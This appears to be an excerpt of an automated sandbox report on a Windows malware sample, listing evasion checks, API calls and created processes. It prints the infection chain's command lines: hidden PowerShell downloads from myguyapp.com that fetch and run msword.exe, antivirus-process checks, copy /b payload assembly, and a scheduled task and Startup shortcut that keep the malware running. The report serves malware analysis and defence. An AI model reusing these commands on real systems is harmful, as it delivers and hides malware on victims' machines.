    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_38-103644
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3174
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2739
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3111
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 757
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6816
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1236
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | API coverage: 4.0 %
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244 | Thread sleep count: 3174 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244 | Thread sleep count: 2739 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276 | Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564 | Thread sleep count: 3111 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564 | Thread sleep count: 757 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3140 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8620 | Thread sleep count: 6816 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8624 | Thread sleep count: 1236 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8660 | Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8644 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\timeout.exe TID: 8812 | Thread sleep count: 82 > 30
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 5236 | Thread sleep time: -117500s >= -30000s
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004062D5 FindFirstFileW,FindClose,13_2_004062D5
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00402E18 FindFirstFileW,13_2_00402E18
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00406C9B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA087
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA1E2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00CDE472
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00CEA570
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE66DC FindFirstFileW,FindNextFileW,FindClose,38_2_00CE66DC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CAC622 FindFirstFileExW,38_2_00CAC622
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00CE73D4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE7333 FindFirstFileW,FindClose,38_2_00CE7333
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDD921
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDDC54
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C75FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,38_2_00C75FC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
    Source: mshta.exe, 00000000.00000002.1859438756.000000000A82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A828000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@S
    Source: mshta.exe, 00000000.00000002.1859438756.000000000A863000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
    Source: mshta.exe, 00000000.00000003.1843566389.000000000A857000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859414539.000000000A820000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859438756.000000000A857000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEF4FF BlockInput,38_2_00CEF4FF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C7338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,38_2_00C7338B
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,13_2_004062FC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C95058 mov eax, dword ptr fs:[00000030h] 38_2_00C95058
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,38_2_00CD20AA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CA2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00CA2992
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C90BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,38_2_00C90BAF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C90D45 SetUnhandledExceptionFilter,38_2_00C90D45
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C90F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00C90F91
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,38_2_00CD1B4D
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C7338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,38_2_00C7338B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDBBED SendInput,keybd_event,38_2_00CDBBED
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDECD0 mouse_event,38_2_00CDECD0
    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,38_2_00CD14AE
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,38_2_00CD1FB0
    Source: Propose.com, 0000001E.00000003.1925473839.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.1918830106.0000000000D13000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: LinkHub.com | Binary or memory string: Shell_TrayWnd
    Source: logs.dat.30.dr | Binary or memory string: [Program Manager]
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C90A08 cpuid 38_2_00C90A08
    Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
